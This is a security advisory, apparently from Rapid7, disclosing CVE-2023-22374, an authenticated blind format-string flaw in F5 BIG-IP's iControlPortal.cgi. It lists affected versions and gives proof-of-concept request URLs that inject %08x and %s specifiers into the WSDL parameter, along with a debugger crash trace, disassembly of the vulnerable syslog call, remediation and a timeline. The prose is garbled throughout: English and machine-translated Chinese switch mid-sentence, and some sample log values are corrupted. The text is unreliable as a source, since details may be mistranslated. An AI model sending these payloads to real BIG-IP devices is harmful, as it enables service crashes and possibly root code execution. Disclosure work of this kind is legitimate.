CVE-2023-22374: F5 BIG-IP Format String Vulnerability

Last updated at Wed, 01 Feb 2023 15:57:57 GMT

While following up our previous work on F5's BIG-IP devices, Rapid7 found an additional vulnerability in the appliance-mode REST interface; the vulnerability was assigned CVE-2023-22374. 我们于2022年12月6日向F5报告，现按照我们的要求进行披露 vulnerability disclosure policy.
我们发现的具体问题是一个身份验证格式字符串漏洞(CWE-134) in the SOAP interface (iControlPortal.cgi)，它以root身份运行，需要管理员登录才能访问. By inserting format string specifiers (such as %s or %n) into certain GET parameters, 攻击者可以使服务读取和写入从堆栈引用的内存地址. 除了作为经过身份验证的管理端点之外, 将公开的内存写入日志(使其成为盲目攻击). 很难影响读和写的具体地址, 这使得这个漏洞在实践中很难被利用(除了使服务崩溃之外). This has a CVSS score of 7.5 for standard mode deployments and 8.5 in appliance mode.

Products

这个问题只影响BIG-IP(不影响BIG-IQ)，到目前为止还没有修复. The currently supported versions known to be vulnerable are:

• F5 BIG-IP 17.0.0
• F5 BIG-IP 16.1.2.2 - 16.1.3
• F5 BIG-IP 15.1.5.1 - 15.1.8
• F5 BIG-IP 14.1.4.6 - 14.1.5
• F5 BIG-IP 13.1.5

Discoverer

This issue was discovered by Ron Bowes of Rapid7. It is being disclosed in accordance with Rapid7’s vulnerability disclosure policy.

Exploitation

The issue we are disclosing is a blind format string vulnerability，通过身份验证的攻击者可以在其中插入任意格式的字符串字符(例如 %d, %x, %s, and %n) into a query parameter, which are passed into the function syslog(), which processes format-string specifiers. 这并不要求攻击者实际读取syslog条目—解析格式字符串的行为才是有问题的. That also means that the attacker can't read 内存，除非他们有额外的方法来读取syslog. By using the %s specifier, 该服务可能会因为分段错误而崩溃(因为它试图将堆栈上的指针作为字符串解引用)。. Using %n, 可以将任意数据写入堆栈上找到的任何指针，这取决于堆栈上存在的内容, this may be exploitable for remote code execution.

The issue occurs in WSDL= parameter in the following authenticated administrative URL:

• http://bigip.example.com/iControl/iControlPortal.cgi?WSDL=ASM.LoggingProfile

The value of the WSDL= parameter is written to the syslog:

Nov 29 08:32:25 bigip.example.org soap[4335]: query: WSDL=ASM.LoggingProfile

If an attacker adds format-string characters to that argument, 它们将被处理，堆栈中的值可以写入syslog(攻击者无法看到这一点), so it's actually a blind format-string vulnerability). For example, this URL:

• http://bigip.example.com/iControl/iControlPortal.cgi?WSDL=ASM.LoggingProfile:%08x:%08x:%08x:%08x:%08x:%08x:%08x:%08x

Might write the following, after expanding the %08x 格式化说明符到堆栈中的值(冒号只是为了可读性):

Nov 29 08:41:47 bigip.example.org soap[4335]: query: WSDL=ASM.LoggingProfile: 0000004 c: 0000004 c: 08年cb31bc: 08年cba210:08cc4954:01000000: ffeaa378: f5aa8000

Once again, we should note that an attacker cannot see this log, and therefore cannot use this to disclose memory. We can, however, use a %s 格式说明符，告诉服务尝试从堆栈中呈现字符串. 如果堆栈上的值不是有效的内存地址(例如第一个值，它是 0x0000004c), the process will crash with a segmentation fault. We can also use the %n 格式说明符将(大多数情况下)任意值写入堆栈上的内存地址.

Here is an example of using the %s specifier in a request:

• http://bigip.example.com/iControl/iControlPortal.cgi?WSDL=ASM.LoggingProfile:%s

如果我们将其发送到服务器(作为经过身份验证的请求)，服务将崩溃. We can attach a debugger to the server process to validate:

[root@bigip:Active:Standalone] config # /tmp/gdb-7.10.1-x64 -q --pid=4335[...](gdb) contContinuing.
Program received signal SIGSEGV, Segmentation fault.0xf55e3085 in vfprintf () from /lib/libc.so.6(gdb) bt#0  0xf55e3085 in vfprintf () from /lib/libc.so.6#1  0xf568f21f in __vsyslog_chk () from /lib/libc.so.6#2  0xf568f317 in syslog () from /lib/libc.so.6#3 0x0810cc1f在PortalDispatch::HandleWSDLRequest(char*) ()#4 0x08109f08在iControlPortal::run(int) ()#5 0x0810947f in main ()

The actual vulnerable code in PortalDispatch::HandleWSDLRequest in iControlPortal.cgi is (in a disassembler):

.text:0810CBF2 loc_810CBF2:                            ; CODE XREF: PortalDispatch::HandleWSDLRequest(char *)+DD↑j.text:0810CBF2                 pop     ecx.text:0810CBF3                 pop     edi.text:0810CBF4                 push    esi             ; Query string.text:0810CBF5                 push    eax.text:0810CBF6                 call    __ZStlsISt11char_traitsIcEERSt13basic_ostreamIcT_ES5_PKc ; std::operator<<>(std::basic_ostream> &,char const*).text:0810CBFB                 pop     eax.text:0810CBFC                 pop     edx.text:0810CBFD                 lea     eax, [ebp+var_8C8].text:0810CC03                 lea     edi, [ebp+format].text:0810CC09                 push    eax.text:0810CC0A                 push    edi.text:0810CC0B                 call    __ZNKSt15basic_stringbufIcSt11char_traitsIcESaIcEE3strEv ; std::basic_stringbuf,std::allocator>::str(void)
.text:0810CC0B ;   } // starts at 810CBE6.text:0810CC10                 pop     eax.text:0810CC11                 push    dword ptr [ebp+format].text:0810CC17                 push    6.text:0810CC19 ;   try {.text:0810CC19                 call    _syslog ; <--- Vulnerable call to syslog().text:0810CC19 ;   } // starts at 810CC19

A String object (that contains query:)将查询字符串附加到其上，然后直接传递给 _syslog(), which processes format string characters.

Impact

成功的攻击最可能造成的影响是使服务器进程崩溃. 熟练的攻击者可能会开发远程代码执行漏洞, 哪个将以root用户在F5 BIG-IP设备上运行代码.

Remediation

目前在已发布的BIG-IP软件版本中没有修复此问题. F5已经表示将会提供一个工程修复程序. 应该强调的是，这个问题只能作为易受攻击设备的认证用户来利用. So, 最终用户应该将对管理端口的访问限制为仅受信任的个人(链接的KB提供了一个要绑定的过程) webd to localhost) which is usually good advice anyway.

Rapid7 customers

针对CVE-2023-22374的身份验证漏洞检查将于今天(2月1日)发布仅限内容的版本. Because F5's hotfix policy 这些修补程序是“不保证可用性”的吗,请注意，InsightVM中的漏洞检查不会考虑热修复程序.

Timeline

• December, 2022 - Discovered the vulnerability
• Tue, Dec 6, 2022 - Reported to F5 SIRT
• 2022年12月7日星期三- F5转发给F5产品工程团队进行分析
• 2022年12月22日，星期四——F5确认了这个问题，并开始着手修复
• 2023年1月4日星期三-向CERT/CC报告的问题(vrf# 23-01-TVJZN)
• Wed, Jan 18, 2023 - F5 provided a draft security advisory, CVSS scoring, and CVE-2023-22374 reservation
• Wed, Feb 1, 2023 - This public disclosure and F5's advisory published